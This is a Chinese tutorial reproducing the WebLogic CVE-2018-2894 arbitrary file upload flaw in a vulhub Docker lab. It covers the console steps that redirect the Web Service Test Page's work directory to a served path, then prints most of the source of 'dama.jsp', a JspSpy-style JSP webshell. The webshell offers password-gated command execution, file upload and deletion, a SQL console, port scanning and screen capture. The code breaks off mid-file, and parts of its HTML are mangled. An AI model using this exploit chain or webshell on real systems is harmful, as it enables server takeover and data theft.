Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞

CVE-2018-2894 任意文件上传漏洞

漏洞影响

Weblogic受影响的版本:

  • 10.3.6.0
  • 12.1.3.0
  • 12.2.1.2
  • 12.2.1.3

漏洞环境

此次我们使用的是vnlhub靶场搭建的环境,是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场,我们 cd 到 CVE-2018-2894,然后输入以下命令启动靶场环境:

docker-compose up -d

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第1张图片

输入以下的命令可以查看当前启动的靶场环境:

docker-compose ps

在这里插入图片描述

漏洞复现

我们首先通过以下的命令获取Weblogic后台登陆的用户名和密码

docker-compose logs | grep password

在这里插入图片描述

然后我们通过URLhttp://IP:7001/console/login/LoginForm.jsp访问靶场界面

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第2张图片

然后我们通过用户名weblogic和刚刚获得密码QghFSif4登陆Weblogic后台界面

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第3张图片

如图,是我们登陆后的界面:

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第4张图片

登录到后台,我们按照登录 -> base-domain ->高级 -> 开启 web测试页 -> 保存的顺序,开启 Web Service Test Page :

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第5张图片

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第6张图片

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第7张图片

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第8张图片

然后我们输入以下的地址访问http:/IP:7001/ws_utc/config.doWeb测试页

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第9张图片

然后我们修改工作目录为以下的路径

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

然后点击提交

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第10张图片

然后我们点击安全——>添加

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第11张图片

上传大马dama.jsp,设置名字dama,点击提交

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第12张图片

dama.jsp的代码内容如下:

<%@page pageEncoding="utf-8"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.util.regex.*"%>
<%@page import="java.sql.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.text.*"%>
<%@page import="java.net.*"%>
<%@page import="java.util.zip.*"%>
<%@page import="java.awt.*"%>
<%@page import="java.awt.image.*"%>
<%@page import="javax.imageio.*"%>
<%@page import="java.awt.datatransfer.DataFlavor"%>
<%@page import="java.util.prefs.Preferences"%>
<%!
    /**
     * JSP大马
     */
    private static final String PW = "password"; // 访问密码 password
    private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
    private static final String REQUEST_CHARSET = "ISO-8859-1";
    private static final String PAGE_CHARSET = "UTF-8";
    private static final String CURRENT_DIR = "currentdir";
    private static final String MSG = "SHOWMSG";
    private static final String PORT_MAP = "PMSA";
    private static final String DBO = "DBO";
    private static final String SHELL_ONLINE = "SHELL_ONLINE";
    private static String SHELL_NAME = "";
    private static String WEB_ROOT = null;
    private static String SHELL_DIR = null;
    public static Map<String,Invoker> ins = new HashMap<String,Invoker>();
    private static class MyRequest extends HttpServletRequestWrapper {
        public MyRequest(HttpServletRequest req) {
            super(req);
        }
        public String getParameter(String name) {
            try {
                String value = super.getParameter(name);
                if (name == null)
                    return null;
                return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
            } catch (Exception e) {
                return null;
            }
        }
    }
    private static class DBOperator{
        private Connection conn = null;
        private Statement stmt = null;
        private String driver;
        private String url;
        private String uid;
        private String pwd;
        public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
            this(driver,url,uid,pwd,false);
        }
        public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
            Class.forName(driver);
            if (connect)
                this.conn = DriverManager.getConnection(url,uid,pwd);
            this.url = url;
            this.driver = driver;
            this.uid = uid;
            this.pwd = pwd;
        }
        public void connect() throws Exception{
            this.conn = DriverManager.getConnection(url,uid,pwd);
        }
        public Object execute(String sql) throws Exception {
            if (isValid()) {
                stmt = conn.createStatement();
                if (stmt.execute(sql)) {
                    return stmt.getResultSet();
                } else {
                    return stmt.getUpdateCount();
                }
            }
            throw new Exception("Connection is inValid.");
        }
        public void closeStmt() throws Exception{
            if (this.stmt != null)
                stmt.close();
        }
        public boolean isValid() throws Exception {
            return conn != null && !conn.isClosed();
        }
        public void close() throws Exception {
            if (isValid()) {
                closeStmt();
                conn.close();
            }
        }
        public boolean equals(Object o) {
            if (o instanceof DBOperator) {
                DBOperator dbo = (DBOperator)o;
                return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
            }
            return false;
        }
    }
    private static class StreamConnector extends Thread {
        private InputStream is;
        private OutputStream os;
        public StreamConnector( InputStream is, OutputStream os ){
            this.is = is;
            this.os = os;
        }
        public void run(){
            BufferedReader in  = null;
            BufferedWriter out = null;
            try{
                in  = new BufferedReader( new InputStreamReader(this.is));
                out = new BufferedWriter( new OutputStreamWriter(this.os));
                char buffer[] = new char[8192];
                int length;
                while((length = in.read( buffer, 0, buffer.length ))>0){
                    out.write( buffer, 0, length );
                    out.flush();
                }
            } catch(Exception e){}
            try{
                if(in != null)
                    in.close();
                if(out != null)
                    out.close();
            } catch( Exception e ){}
        }
    }
    private static class OnLineProcess {
        private String cmd = "first";
        private Process pro;
        public OnLineProcess(Process p){
            this.pro = p;
        }
        public void setPro(Process p) {
            this.pro = p;
        }
        public void setCmd(String c){
            this.cmd = c;
        }
        public String getCmd(){
            return this.cmd;
        }
        public Process getPro(){
            return this.pro;
        }
        public void stop(){
            this.pro.destroy();
        }
    }
    private static class OnLineConnector extends Thread {
        private OnLineProcess ol = null;
        private InputStream is;
        private OutputStream os;
        private String name;
        public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
            this.is = is;
            this.os = os;
            this.name = name;
            this.ol = ol;
        }
        public void run(){
            BufferedReader in  = null;
            BufferedWriter out = null;
            try{
                in  = new BufferedReader( new InputStreamReader(this.is));
                out = new BufferedWriter( new OutputStreamWriter(this.os));
                char buffer[] = new char[128];
                if(this.name.equals("exeRclientO")) {
//from exe to client
                    int length = 0;
                    while((length = in.read( buffer, 0, buffer.length ))>0){
                        String str = new String(buffer, 0, length);
                        str = str.replace("&","&").replace("<","<").replace(">",">");
                        str = str.replace(""+(char)13+(char)10,"
"
); str = str.replace("\n","
"
); out.write(str.toCharArray(), 0, str.length()); out.flush(); } } else { //from client to exe while(true) { while(this.ol.getCmd() == null) { Thread.sleep(500); } if (this.ol.getCmd().equals("first")) { this.ol.setCmd(null); continue; } this.ol.setCmd(this.ol.getCmd() + (char)10); char[] arr = this.ol.getCmd().toCharArray(); out.write(arr,0,arr.length); out.flush(); this.ol.setCmd(null); } } } catch(Exception e){ } try{ if(in != null) in.close(); if(out != null) out.close(); } catch( Exception e ){ } } } private static class Table{ private ArrayList<Row> rows = null; private boolean echoTableTag = false; public void setEchoTableTag(boolean v) { this.echoTableTag = v; } public Table(){ this.rows = new ArrayList<Row>(); } public void addRow(Row r) { this.rows.add(r); } public String toString(){ StringBuilder html = new StringBuilder(); if (echoTableTag) html.append("");for(Row r:rows){ html.append("\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");for(Column c:r.getColumns()){ html.append("");} html.append("");}if(echoTableTag) html.append("
"); String vv = Util.htmlEncode(Util.getStr(c.getValue())); if (vv.equals("")) vv = " "; html.append(vv); html.append("
"
); return html.toString(); } } private static class Row{ private ArrayList<Column> cols = null; public Row(){ this.cols = new ArrayList<Column>(); } public void addColumn(Column n) { this.cols.add(n); } public ArrayList<Column> getColumns(){ return this.cols; } } private static class Column{ private String value; public Column(String v){ this.value = v; } public String getValue(){ return this.value; } } private static class Util{ public static boolean isEmpty(String s) { return s == null || s.trim().equals(""); } public static boolean isEmpty(Object o) { return o == null || isEmpty(o.toString()); } public static String getSize(long size,char danwei) { if (danwei == 'M') { double v = formatNumber(size / 1024.0 / 1024.0,2); if (v > 1024) { return getSize(size,'G'); }else { return v + "M"; } } else if (danwei == 'G') { return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; } else if (danwei == 'K') { double v = formatNumber(size / 1024.0,2); if (v > 1024) { return getSize(size,'M'); } else { return v + "K"; } } else if (danwei == 'B') { if (size > 1024) { return getSize(size,'K'); }else { return size + "B"; } } return ""+0+danwei; } public static double formatNumber(double value,int l) { NumberFormat format = NumberFormat.getInstance(); format.setMaximumFractionDigits(l); format.setGroupingUsed(false); return new Double(format.format(value)); } public static boolean isInteger(String v) { if (isEmpty(v)) return false; return v.matches("^\\d+$"); } public static String formatDate(long time) { SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); return format.format(new java.util.Date(time)); } public static String convertPath(String path) { return path != null ? path.replace("\\","/") : ""; } public static String htmlEncode(String v) { if (isEmpty(v)) return ""; return v.replace("&","&").replace("<","<").replace(">",">"); } public static String getStr(String s) { return s == null ? "" :s; } public static String getStr(Object s) { return s == null ? "" :s.toString(); } public static String exec(String regex, String str, int group) { Pattern pat = Pattern.compile(regex); Matcher m = pat.matcher(str); if (m.find()) return m.group(group); return null; } public static void outMsg(Writer out,String msg) throws Exception { outMsg(out,msg,"center"); } public static void outMsg(Writer out,String msg,String align) throws Exception { if (msg.indexOf("java.lang.ClassNotFoundException") != -1) msg = "Can Not Find The Driver!
"
+ msg; out.write("
\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"
"
); } } private static class UploadBean { private String fileName = null; private String suffix = null; private String savePath = ""; private ServletInputStream sis = null; private byte[] b = new byte[1024]; public UploadBean() { } public void setSavePath(String path) { this.savePath = path; } public void parseRequest(HttpServletRequest request) throws IOException { sis = request.getInputStream(); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b,0,b.length))!= -1) { s = new String(b, 0, a,PAGE_CHARSET); if ((k = s.indexOf("filename=\""))!= -1) { s = s.substring(k + 10); k = s.indexOf("\""); s = s.substring(0, k); File tF = new File(s); if (tF.isAbsolute()) { fileName = tF.getName(); } else { fileName = s; } k = s.lastIndexOf("."); suffix = s.substring(k + 1); upload(); } } } private void upload() { try { FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b,0,b.length))!=-1) { s = new String(b, 0, a); if ((k = s.indexOf("Content-Type:"))!=-1) { break; } } sis.readLine(b,0,b.length); while ((a = sis.readLine(b,0,b.length)) != -1) { s = new String(b, 0, a); if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { break; } out.write(b, 0, a); } out.close(); } catch (IOException ioe) { ioe.printStackTrace(); } } } %> <% SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); String myAbsolutePath = application.getRealPath(request.getServletPath()); if (Util.isEmpty(myAbsolutePath)) {//for weblogic SHELL_NAME = request.getServletPath(); myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); SHELL_NAME=request.getContextPath()+SHELL_NAME; WEB_ROOT = new File(application.getResource("/").getPath()).toString(); } else { WEB_ROOT = application.getRealPath("/"); } SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); if (session.getAttribute(CURRENT_DIR) == null) session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); //request = new MyRequest(request); HttpServletRequest myrequest = new MyRequest(request); if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { String o = request.getParameter("o"); if (o != null && o.equals("login")) { ins.get("login").invoke(myrequest,response,session); return; } else if (o != null && o.equals("vLogin")) { ins.get("vLogin").invoke(myrequest,response,session); return; } else { response.sendRedirect(SHELL_NAME+"?o=vLogin"); return; } } %> <%! private static interface Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; public boolean doBefore(); public boolean doAfter(); } private static class DefaultInvoker implements Invoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { } public boolean doBefore(){ return true; } public boolean doAfter() { return true; } } private static class ScriptInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class BeforeInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("JspSpy Codz By - Ninty\"margin:0;table-layout:fixed; word-break:break-all\">"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class AfterInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class DeleteBatchInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String files = request.getParameter("files"); if (!Util.isEmpty(files)) { String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); String[] arr = files.split(","); for (String fs:arr) { File f = new File(currentDir,fs); f.delete(); } } JSession.setAttribute(MSG,"Delete Files Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class ClipBoardInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ " "+ "
"+ "

System Clipboard »

"
+ "

");
                try{
                    out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
                }catch (Exception ex) {
                    out.println("ClipBoard is Empty Or Is Not Text Data !");
                }
                out.println("
"
+ " \"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />"+ "

"
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VRemoteControlInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+ " "+ " "+ " "+ "
"+ "

Remote Control »

\"
bt\" οnclick=\"var img = document.getElementById('screen').src='"+SHELL_NAME+"?o=gc&rnd='+Math.random();\" name=\"getsc\" id=\"getsc\" value=\"Get Screen\" type=\"button\" size=\"100\" />"+ " \"bt\" name=\"button\" id=\"button\" onClick=\"a(this)\" value=\"Start\" type=\"button\" size=\"100\" /> Speed(Second , dont be so fast) Can Not Control Yet."+ "

"
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } //GetScreen private static class GcInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); BufferedImage img = new Robot().createScreenCapture(rec); response.setContentType("image/jpeg"); ImageIO.write(img,"jpg",response.getOutputStream()); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VPortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); if (Util.isEmpty(ip)) ip = "127.0.0.1"; if (Util.isEmpty(ports)) ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; if (Util.isEmpty(timeout)) timeout = "2"; out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "

\"Bin_H2_Title\">PortScan >>

"
+ "
\"YwLB\">
\""+SHELL_NAME+"\" method=\"post\">"+ "

\"hidden\" value=\"portScan\" name=\"o\">"+ "IP : \"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : \"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> Timeout ?????: \"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> \"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+ "

"
+ "
"
+ "
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class PortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); ins.get("vPortScan").invoke(request,response,JSession); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); int iTimeout = 0; if (Util.isEmpty(ip) || Util.isEmpty(ports)) return; if (!Util.isInteger(timeout)) { timeout = "2"; } iTimeout = Integer.parseInt(timeout); Map<String,String> rs = new LinkedHashMap<String,String>(); String[] portArr = ports.split(","); for (String port:portArr) { try { Socket s = new Socket(); s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); s.close(); rs.put(port,"Open"); } catch (Exception e) { rs.put(port,"Close"); } } out.println("
"); Set<Map.Entry<String,String>> entrySet = rs.entrySet(); for (Map.Entry<String,String> e:entrySet) { String port = e.getKey(); String value = e.getValue(); out.println(ip+" : "+port+" ................................. (value.equals("Open")?"green":"red")+">"+value+"
"); } out.println("
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VConnInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object obj = JSession.getAttribute(DBO); if (obj == null || !((DBOperator)obj).isValid()) { out.println(" "); out.println("\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">
"+ "
\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+ "\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+ "

DataBase Manager »

"
+ "\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+ "

"+ "Driver:"+ " \"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />"+ "URL:"+ "\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"+ "UID:"+ "\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"+ "PWD:"+ "\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"+ "DataBase:"+ " "+ "\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"+ "

"
+ ""
); out.println("
\""+SHELL_NAME+"\" method=\"POST\">"+ "

\"hidden\" name=\"selectDb\" value=\""+selectDb+"\">\"hidden\" name=\"o\" value=\"executesql\">

\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
\"2\">Run SQL query/queries on database :
\"padding:0 5px;\">\"bt\" style=\"height:50px;\" name=\"submit\" type=\"submit\" value=\"Query\" />

"
); } catch (Exception e) { //e.printStackTrace(); throw e; } } } private static class ExecuteSQLInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String sql = request.getParameter("sql"); String db = request.getParameter("selectDb"); Object dbo = JSession.getAttribute(DBO); if (!Util.isEmpty(sql)) { if (dbo == null || !((DBOperator)dbo).isValid()) { response.sendRedirect(SHELL_NAME+"?o=vConn"); } else { ins.get("dbc").invoke(request,response,JSession); Object obj = ((DBOperator)dbo).execute(sql); if (obj instanceof ResultSet) { ResultSet rs = (ResultSet)obj; ResultSetMetaData meta = rs.getMetaData(); int colCount = meta.getColumnCount(); out.println("<div style='padding:10px'><p><b>Query#0 : "+Util.htmlEncode(sql)+"</b></p>"); out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\"><tr class=\"head\">"); for (int i=1;i<=colCount;i++) { out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>"); } out.println("</tr>"); Table tb = new Table(); while(rs.next()) { Row r = new Row(); for (int i = 1;i<=colCount;i++) { r.addColumn(new Column(rs.getString(i))); } tb.addRow(r); } out.println(tb.toString()); out.println("
"); rs.close(); ((DBOperator)dbo).closeStmt(); } else { out.println("<div style='margin:10px'><h2>affected rows : <b>"+obj+"</b></h2></div>"); } } } else { ins.get("dbc").invoke(request,response,JSession); } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class VLoginInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("<style type=\"text/css\">"+ " input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+ "a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+ " </style><form method=\"POST\" action=\""+SHELL_NAME+"\">"+ " <p><span style=\"font:11px Verdana;\">Password: </span>"+ " <input name=\"o\" type=\"hidden\" value=\"login\">"+ " <input name=\"pw\" type=\"password\" size=\"20\">"+ " <input type=\"hidden\" name=\"o\" value=\"login\">"+ " <input type=\"submit\" value=\"Login\"><br/><br/>"+ " "+ " </form>"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class LoginInvoker extends DefaultInvoker{ public boolean doBefore() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String inputPw = request.getParameter("pw"); if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { response.sendRedirect(SHELL_NAME+"?o=vLogin"); return; } else { JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); response.sendRedirect(SHELL_NAME+"?o=index"); return; } } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class MyComparator implements Comparator<File>{ public int compare(File f1,File f2) { if (f1 != null && f2!= null) { if (f1.isDirectory()) { if (f2.isDirectory()) { return f1.getName().compareTo(f2.getName()); } else { return -1; } } else { if (f2.isDirectory()) { return 1; } else { return f1.getName().compareTo(f2.getName()); } } } return 0; } } private static class FileListInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String path = request.getParameter("folder"); if (Util.isEmpty(path)) path = JSession.getAttribute(CURRENT_DIR).toString(); JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); File file = new File(path); if (!file.exists()) { throw new Exception(path+"Dont Exists !"); } JSession.setAttribute(CURRENT_DIR,path); File[] list = file.listFiles(); Arrays.sort(list,new MyComparator()); out.println("
"); String cr = null; try { cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); }catch(Exception e) { cr = "/"; } File currentRoot = new File(cr); out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

"
); out.println("
\""+SHELL_NAME+"\" method=\"post\">"+ "\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+ " "+ " "+ " "+ " "+ " "+ "
Current Directory \"hidden\" name=\"o\" value=\"filelist\"/>\"98%\">\"input\" name=\"folder\" value=\""+JSession.getAttribute(CURRENT_DIR)+"\" type=\"text\" style=\"width:100%;margin:0 8px;\">\"bt\" value=\"GO\" type=\"submit\">
"
+ ""
); out.println("\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+ "
\"
"+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\">\"alt1\">"+ ""+ "\"head\">"+ " "+ " "+ " "+ " "+ " "+ "");if(file.getParent()!= null){ out.println(""+ ""+ ""+ "");} int dircount =0; int filecount =0;for(File f:list){if(f.isDirectory()){ dircount ++; out.println("\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+ ""+ ""+ ""+ ""+ ""+ ""+ "");}else{ filecount++; out.println("\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+ ""+ ""+ ""+ ""+ ""+ ""+ "");}} out.println("\"alt2\">"+ " "+ " "+ "
\"7\" style=\"padding:5px;\">"+ "
\"float:right;\">\"input\" name=\"file\" value=\"\" type=\"file\" /> \"bt\" name=\"doupfile\" value=\"Upload\" type=\"submit\" />
"
+ "\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir()\">Web Root"+ " | \"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir()\">Shell Directory"+ " | \"javascript:new fso({}).mkdir()\">New Directory | \"javascript:new fso({}).createFile()\">New File"+ " | "); File[] roots = file.listRoots(); for (int i = 0;i<roots.length;i++) { File r = roots[i]; out.println("\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir();\">Disk("+Util.convertPath(r.getPath())+")"); if (i != roots.length -1) { out.println("|"); } } out.println("
 Name\"16%\">Last Modified\"10%\">Size\"20%\">Read/Write/Execute\"22%\"
\"center\">\"Wingdings 3\" size=4>=\"5\">\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent
\"2%\" nowrap>\"wingdings\" size=\"3\">0\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del | \"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move | \"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack
\"2%\" nowrap>\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ "\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit | "+ "\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down | "+ "\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy | "+ "\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move | "+ "\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property"); if (f.getName().endsWith(".zip")) { out.println(" | \"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack"); } else if (f.getName().endsWith(".rar")) { out.println(" | \"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack"); } else { out.println(" | \"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack"); } out.println("
\"center\"\"javascript:new fso({}).packBatch();\">Pack Selected - \"javascript:new fso({}).deleteBatch();\">Delete Selected\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files
"
); out.println("
"
); } catch (Exception e) { e.printStackTrace(); throw e; } } } private static class LogoutInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { Object dbo = JSession.getAttribute(DBO); if (dbo != null) ((DBOperator)dbo).close(); Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket)obj; s.close(); } Object online = JSession.getAttribute(SHELL_ONLINE); if (online != null) ((OnLineProcess)online).stop(); JSession.invalidate(); response.sendRedirect(SHELL_NAME+"?o=vLogin"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class UploadInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { UploadBean fileBean = new UploadBean(); response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); fileBean.parseRequest(request); JSession.setAttribute(MSG,"Upload File Success!"); response.sendRedirect(SHELL_NAME+"?o=index"); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class CopyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String src = request.getParameter("src"); String to = request.getParameter("to"); BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new 